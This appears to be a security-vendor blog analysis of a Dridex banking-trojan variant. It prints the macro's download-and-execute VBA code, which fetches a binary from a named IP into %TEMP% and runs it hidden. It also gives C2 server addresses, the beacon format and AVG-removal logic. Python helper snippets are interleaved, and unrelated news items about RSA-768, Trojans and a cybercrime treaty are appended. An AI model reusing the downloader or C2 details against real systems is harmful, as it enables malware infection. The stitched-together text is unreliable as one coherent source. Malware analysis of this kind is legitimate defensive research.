pjIOHdsfc = UserForm1.TextBox1 (which points to the string http://31.131.24.203/indiana/jones.php)

dTYFidsff = Environ(StrReverse("PMET")) & UserForm1.TextBox2 (which points to the string \yFUYIdsf.exe)

Dim erDTFGHJkds As Object
Set erDTFGHJkds = CreateObject(StrReverse("1.5.tseuqerPTTHniW.PTTHniW"))
erDTFGHJkds.Open StrReverse("TEG"), pjIOHdsfc, False
erDTFGHJkds.Send
Open dTYFidsff For Binary Access Write As #yFVHJBkdsf
sjdhfbk = Shell(dTYFidsff, vbHide)

The VBA Open command is responsible for connecting and downloading Dridex, while the VBA Shell command executes it. In this example, it downloads Dridex from http://31.131.24.203/indiana/jones.php, which is then saved as %TEMP%\yFUYIdsf.exe and executed.

DOWNLOADED DRIDEX EXECUTABLE

The downloaded Dridex executable has an MD5 of EBB1562E4B0ED5DB8A646710F3CD2EB8. Analyzing this executable is like peeling an orange: we have to remove the outer layer first to get to the good stuff. We can break the Dridex executable into two parts: the Decoder and the Naked Dridex.

THE DECODER

A quick glance at its entry point suggests a Microsoft Visual C++ 6.0 compiled program. It is indeed compiled with Microsoft Visual C++ 6.0, except that the usual code path is not followed: Dridex code is inserted right before WinMain is called (WinMain is the usual entry point of a Visual C++ 6 compiled executable). The malware author intended this to hide the code from the researcher. There is also a lot of useless code, strings, loops and Windows API calls to throw off researchers when debugging.

The code will look for kernel32.VirtualAlloc API by traversing kernel32.dll’s import table and comparing it to the hash of “3A8E4D14h” using its own hashing algorithm.

Decoder resolving VirtualAlloc

It uses the unconventional PUSH DWORD OFFSET – RETN combination instead of a direct CALL DWORD approach to hide its procedures.

PUSH-RETN

Once the address of kernel32.VirtualAlloc has been saved, it uses that API to allocate 5A44h bytes, decrypts code into the allocated memory and transfers execution there.

It then traverses kernel32.dll again to get its base address and populate the API table needed for further unpacking. Using GetProcAddress, it resolves the following APIs:

  • CloseHandle
  • CreateThread
  • CreateToolhelp32Snapshot
  • EnterCriticalSection
  • EnumServicesStatusExA
  • FreeConsole
  • GetCurrentProcessId
  • GetCurrentThreadId
  • GlobalAlloc
  • GlobalFree
  • InitializeCriticalSection
  • IsBadReadPtr
  • LeaveCriticalSection
  • LoadLibraryA
  • OpenSCManagerA
  • RegCloseKey
  • RegOpenKeyExA
  • RtlDecompressBuffer
  • RtlZeroMemory
  • Thread32First
  • Thread32Next
  • VirtualAlloc
  • VirtualFree
  • VirtualProtect
  • ZwCreateFile
  • ZwCreateThread
  • ZwCreateThreadEx
  • ZwCreateUserProcess
  • ZwOpenFile
  • ZwOpenProcess
  • ZwProtectVirtualMemory
  • ZwQueueApcThread
  • ZwSetContextThread
  • ZwSetValueKey
  • ZwSuspendThread
  • ZwTerminateProcess
  • ZwWriteVirtualMemory

After a series of steps debugging obfuscated code and decrypting, it finally calls RtlDecompressBuffer, which decompresses an MZ-PE file in memory; execution is then transferred to it using CreateThread. This decompressed executable (we call it Naked Dridex) has long been detected as Trojan.Win32.Dridex.aa (v) by VIPRE. Based on this observation, this variant of the Dridex executable was already caught in the past, which is why ThreatTrack's VIPRE Antivirus detects it with a heuristic pattern. The only difference now is that it is wrapped in a "new" protective layer meant to bypass most antivirus engines.

We also made another interesting discovery while debugging: the malware attempts to hide its tracks by using the Windows API FreeConsole. Per MSDN, FreeConsole detaches the calling process from its console.

PEiD output

Since this executable uses the Win32 console subsystem, you would expect a console window to pop up and close abruptly if you run it in Windows (i.e. double-click to execute). That only means it detached itself from the console while continuing to run in the background. One way to test this is to execute the malware from CMD.EXE: no further input will be accepted, because FreeConsole detached the malware from CMD.EXE. Even pressing CTRL-C or CTRL-BREAK, or closing CMD.EXE altogether, will not stop it from progressing.

THE NAKED DRIDEX 

This is where it all gets interesting. Although we have peeled off most of its outer layer, this malware still has plenty of obfuscated code within it. Note that its Import Address Table is 0, meaning that at some point it will have to populate its IAT.

Import Address Table set to 0

The following Windows APIs are used:

  • AllocateAndInitializeSid
  • CharLowerA
  • CloseHandle
  • CommandLineToArgvW
  • CompareStringA
  • CreateFileW
  • CryptAcquireContextW
  • CryptCreateHash
  • CryptDestroyHash
  • CryptGenRandom
  • CryptGetHashParam
  • CryptHashData
  • CryptReleaseContext
  • DeleteFileW
  • EqualSid
  • ExitProcess
  • ExpandEnvironmentStringsW
  • FindClose
  • FindFirstFileW
  • FindNextFileW
  • FreeSid
  • GetCurrentProcess
  • GetFileAttributesW
  • GetLastError
  • GetTokenInformation
  • GetVersionExW
  • HeapAlloc
  • HeapCreate
  • HeapFree
  • HeapSize
  • HeapValidate
  • HttpOpenRequestW
  • HttpQueryInfoW
  • HttpSendRequestW
  • InternetCloseHandle
  • InternetConnectW
  • InternetOpenA
  • InternetQueryOptionW
  • InternetReadFile
  • InternetSetOptionW
  • IsWow64Process
  • LoadLibraryW
  • MultiByteToWideChar
  • OpenProcessToken
  • RegCloseKey
  • RegEnumKeyA
  • RegOpenKeyExA
  • RegQueryValueExA
  • RemoveDirectoryW
  • RtlComputeCrc32
  • RtlFillMemory
  • RtlGetLastWin32Error
  • RtlMoveMemory
  • SetFileAttributesW
  • SetFilePointer
  • Sleep
  • WideCharToMultiByte
  • WTSEnumerateSessionsW
  • WTSFreeMemory
  • WTSQueryUserToken
  • wvnsprintfW

Previous versions of Dridex had a CnC configuration that was usually easy to find and decrypt with a linear XOR, or was even seen in plain text in the body, like this:

<config botnet="xxx">
   <server_list>
      37.139.47.105:80
      66.110.179.66:8080
      5.39.99.18:80
      136.243.237.218:80
   </server_list>
</config>

In this version, however, the settings are located in the .data section in raw hex, just to make them harder for the researcher to spot.

CnC settings viewed in Hiew

Converting them to their ASCII counterparts gives the following settings:

Bot version: 0x78 = 120

CnC Servers:

0xB9.0x18.0x5C.0xE5:0x1287 = 185.24.92.229:4743

0x67.0xE0.0x53.0x82:0x102F = 103.224.83.130:4143

0x2E.0x65.0x9B.0x35:0x0477 = 46.101.155.53:1143

0x01.0xB3.0xAA.0x07:0x118D = 1.179.170.7:4493
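Decoding these by hand is error-prone, so here is an added example (not from the original post) that turns the raw bytes above into the version and "ip:port" strings listed. The record layout it assumes is ours: one version byte, then 6-byte records of four address bytes followed by a two-byte port with the most significant byte first, which is the byte order the listing above implies. The encoder is the inverse, useful for turning an IoC list back into a byte pattern for a scanner.

```python
import struct

# Added example, not from the original post: decode the .data-section settings
# above. Assumed record layout (ours): one version byte, then 6-byte records of
# IPv4 address (4 bytes) + port (2 bytes, most significant byte first).
SAMPLE_CONFIG = bytes([
    0x78,                                  # bot version 120
    0xB9, 0x18, 0x5C, 0xE5, 0x12, 0x87,    # 185.24.92.229:4743
    0x67, 0xE0, 0x53, 0x82, 0x10, 0x2F,    # 103.224.83.130:4143
    0x2E, 0x65, 0x9B, 0x35, 0x04, 0x77,    # 46.101.155.53:1143
    0x01, 0xB3, 0xAA, 0x07, 0x11, 0x8D,    # 1.179.170.7:4493
])

RECORD = struct.Struct(">4sH")   # 4 raw address bytes, then big-endian port


def decode_cnc_config(blob: bytes):
    """Return (bot_version, ["ip:port", ...]). Trailing bytes that do not
    fill a whole record are ignored."""
    version = blob[0]
    servers = []
    for off in range(1, len(blob) - RECORD.size + 1, RECORD.size):
        addr, port = RECORD.unpack_from(blob, off)
        ip = ".".join(str(b) for b in addr)
        servers.append(f"{ip}:{port}")
    return version, servers


def encode_cnc_config(version: int, servers) -> bytes:
    """Inverse of decode_cnc_config: build the byte blob from an IoC list."""
    out = bytearray([version])
    for entry in servers:
        ip, port = entry.rsplit(":", 1)
        out += RECORD.pack(bytes(int(o) for o in ip.split(".")), int(port))
    return bytes(out)


if __name__ == "__main__":
    ver, cnc = decode_cnc_config(SAMPLE_CONFIG)
    print("bot version", ver)
    for s in cnc:
        print(" ", s)
```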

Dridex collects information to fingerprint the infected system. Data such as the Windows version and service pack, computer name, username, install date and installed software is gathered and sent to a CnC server.

A unique name for the infected system is generated by computing the MD5 of the combined data from the following registry values:

  • Key HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/ComputerName/ComputerName, value ComputerName
  • Key HKEY_LOCAL_MACHINE/Volatile Environment, value USERNAME
  • Key HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion, value InstallDate

The MD5 result will be appended to the ComputerName joined with the character “_” (e.g. “WINXP_2449c0c0c6a9ffb4e33613709f4db358”).

It also gathers a list of installed software by enumerating the subkeys of HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall and reading their "DisplayName" and "DisplayVersion". It constructs a string in the format "DisplayName (DisplayVersion)", separated by ";", for every subkey enumerated.

It then attempts to remove AVG antivirus from the infected system by searching for its settings in the registry key "HKLM/SYSTEM/CurrentControlSet/services/Avg/SystemValues" and traversing the %LocalAppData% folder for its files. It even supports deleting future versions of AVG, from AVG2010 up to AVG2020.

We noticed, though, what seems to be a coding irregularity on the malware author's part: the name is built as AVG20(%d), where %d starts at 20 and is decremented by one (e.g. AVG2020, AVG2019, AVG2018, etc.). So when it reaches AVG2010, instead of continuing to AVG2009 it becomes AVG209, AVG208, AVG207, down to AVG206.
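The irregularity is a classic formatting slip, and it is worth seeing exactly which names the loop does and does not produce. The following is an added example (not from the original post or from Dridex): it reproduces the "AVG20" + counter scheme described above, alongside what the author presumably intended, and lists the names that fall in the gap. The function names and the intended range are ours.

```python
# Added example, not from the original post: why "AVG2010" is followed by
# "AVG209". The name is "AVG20" + a decimal counter (the equivalent of C's
# "AVG20%d"), so once the counter drops below 10 the leading zero is lost.
def avg_names_as_coded(start: int = 20, stop: int = 6):
    """Names the loop actually checks, counting the suffix down from 20."""
    return [f"AVG20{d}" for d in range(start, stop - 1, -1)]


def avg_names_intended(start: int = 2020, stop: int = 2006):
    """What was presumably meant (our assumption): a four-digit year
    counting down over the same number of iterations."""
    return [f"AVG{year}" for year in range(start, stop - 1, -1)]


def names_never_checked():
    """Product names the intended range covers but the coded loop misses."""
    return sorted(set(avg_names_intended()) - set(avg_names_as_coded()))


if __name__ == "__main__":
    print(avg_names_as_coded())
    print("missed:", names_never_checked())
```

A zero-padded two-digit counter (the "%02d" form) would have produced AVG2009 through AVG2006; as written, installations named that way are simply never matched.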

This is the message format sent to a CnC:

<loader><get_module unique="%s" botnet="%d" system="%d" name="%s" bit="%d"/>

Sample message:

<loader><get_module unique="WINXP_2449c0c0c6a9ffb4e33613709f4db358" botnet="120" system="23120" name="list" bit="32"/><soft><![CDATA[4NT Unicode 6.0 (6.0);AOL Instant Messenger;CodeStuff Starter (5.6.2.0);Compuware DriverStudio 3.2 (3.2);HijackThis 1.99.1 (1.99.1);IDA Pro Advanced v5.0;InstallRite 2.5;mIRC (6.21);PE Explorer 1.96 (1.96);Viewpoint Media Player;VideoLAN VLC media player 0.8.6c(0.8.6c);Windows XP Service Pack 2 (20040803.231319);WinHex;WinPcap 4.0.1 (4.0.0.901);WinRAR archiver;Wireshark 0.99.6a (0.99.6a);Yahoo! Messenger;ActivePerl5.8.3 Build 809 (5.8.809);Debugging Tools for Windows (x86) (6.9.3.113);Microsoft Visual C++ 2008 Redistributable – x86 9.0.30729.4148 (9.0.30729.4148);Python 2.5.1 (2.5.1150);WebFldrs XP (9.50.5318);UltraEdit-32 (10.20c);Java 2 RuntimeEnvironment, SE v1.4.2_15 (1.4.2_15);Microsoft Office Professional Edition 2003 (11.0.5614.0);MSN Messenger 7.0 (7.0.0777);Adobe Reader 6.0 (6.0);VMware Tools (9.6.1.1378637);Compuware DriverStudio (3.2);Starting path: 5]]></soft></loader>
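The beacon is well-formed XML, so its fields can be pulled out for a detection rule or for enrichment in an IDS alert. The following is an added example (not from the original post): it parses a message of the shape above with Python's ElementTree and applies a structural check, the <loader>/<get_module> shape plus the <ComputerName>_<32 hex> unique id described earlier. SAMPLE_BEACON reuses the page's values with the software list shortened; the function names are ours.

```python
import re
import xml.etree.ElementTree as ET

# Added example, not from the original post: parse a Dridex loader beacon like
# the sample above so its fields can feed a detection rule. SAMPLE_BEACON
# reuses the page's values with the software list shortened; names are ours.
SAMPLE_BEACON = (
    '<loader><get_module unique="WINXP_2449c0c0c6a9ffb4e33613709f4db358" '
    'botnet="120" system="23120" name="list" bit="32"/>'
    '<soft><![CDATA[4NT Unicode 6.0 (6.0);AOL Instant Messenger;'
    'Wireshark 0.99.6a (0.99.6a);VMware Tools (9.6.1.1378637);'
    'Starting path: 5]]></soft></loader>'
)

UNIQUE_RE = re.compile(r"^[^_]+_[0-9a-f]{32}$")   # <ComputerName>_<md5 hex>


def parse_beacon(body: str):
    """Return the beacon's fields as a dict, or None if the body is not a
    <loader><get_module .../> message."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    if root.tag != "loader":
        return None
    module = root.find("get_module")
    if module is None:
        return None
    soft = root.findtext("soft") or ""
    return {
        "unique": module.get("unique", ""),
        "botnet": int(module.get("botnet", "0")),
        "system": module.get("system", ""),
        "name": module.get("name", ""),
        "bit": int(module.get("bit", "0")),
        "software": [s for s in soft.split(";") if s],
    }


def looks_like_dridex_beacon(body: str) -> bool:
    """Cheap structural check: loader/get_module shape plus the
    <name>_<32 hex> unique id the write-up describes."""
    fields = parse_beacon(body)
    return bool(fields) and UNIQUE_RE.match(fields["unique"]) is not None


if __name__ == "__main__":
    info = parse_beacon(SAMPLE_BEACON)
    print("botnet", info["botnet"], "unique", info["unique"])
    print(len(info["software"]), "installed packages reported")
```

The botnet id and the installed-software list are the two fields an analyst usually wants from a captured beacon: the first ties the infection to a campaign, the second tells you what the operators learned about the host.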

The malware then attempts to connect to its CnC servers using SSL requests by using wininet functions such as InternetConnectW and HttpOpenRequestW. It then sends the data gathered earlier using HttpSendRequestW.

Wireshark capture of the CnC connection

The server even replies with a malicious SSL certificate upon a successful connection. SQUERT identified the malicious SSL certificate as Dridex.

[Figure: SQUERT alert on the SSL certificate]

[Figure: Hiew view of the SSL certificate]

At this point the CnC server is expected to deliver a malicious DLL with an export function named "NotifierInit" and inject it into a running EXPLORER.EXE process; however, the CnCs in its list had been taken down as of this writing.

WHAT TO DO?

To keep Dridex at bay, we recommend blocking it early, at the root of its infection chain. Here are some tips:

  • Always keep your operating system and security products up to date.
  • Take precaution when opening attachments, especially when sent by an unknown sender.
  • Never enable VBA macros by default for any Microsoft Office application. Some macro malware even tells you how to enable macros or tries to mislead you into doing so.
  • Leverage advanced threat defense tools like ThreatSecure Email to protect against spear-phishing and targeted malware attacks that bypass traditional defenses. Cybercriminals have developed increasingly sophisticated attacks to bypass anti-spam and email filtering technologies and infiltrate your network. ThreatSecure Email identifies suspicious emails, detects malicious attachments or links, and stops them before they can reach their target, without relying on signatures.

HASHES

A6844F8480E641ED8FB0933061947587 - malicious MHT attachment (LooksLike.MHT.Malware.a (v))

EBB1562E4B0ED5DB8A646710F3CD2EB8 - Dridex executable (Trojan.Win32.Generic!BT)

The post What’s New with Dridex appeared first on ThreatTrack Security Labs Blog.

768-bit RSA cracked

Researchers have factored a 768-bit number with 232 decimal digits into its two prime factors and published a paper with their results. The number is the string released as "RSA-768" under the now defunct RSA Challenge. As a result, RSA encryption with 768-bit keys must, from now on, be considered cracked.

Seven Habits of Highly Malicious Hackers

You can't defend against the cyber enemy if you don't know his movements or how he thinks.

Sanjay Bavisi, president of the security certification, training, and education organization EC-Council, will demonstrate step by step how a typical black-hat hacker executes an attack, from reconnaissance to covering his tracks, in the "Seven Habits of Highly Malicious Hackers" presentation at Interop Las Vegas next Thursday.

Profit-Minded Trojans

MAY 11, 2007 | The first Trojan horse was designed to win the war and get the girl. But according to new research from PandaLabs, Trojan software makers now have gone commercial.

Sixty-six percent of the new Trojans that emerged in the first quarter of 2007 were designed for financial gain, according to the security company's quarterly research report, which was published Wednesday.

Senate OKs Controversial Internet Treaty

The U.S. Senate Friday ratified an international treaty designed to ease investigation of cybercrime, but U.S. civil liberties groups say that signing the pact is a big mistake. The Council of Europe's Convention on Cybercrime, which began circulating in 2001, has been adopted by 41 other countries, including most of Europe as well as Canada and Japan. It is designed to harmonize laws on computer crime, which differ from country to country. Countries that sign the treaty agree to establish some common laws against criminal behavior online, such as attacks on computer networks, terrorist tactics, and exploitation of children. The language of the treaty is very broad and doesn't require the U.S. to write any new cybercrime laws.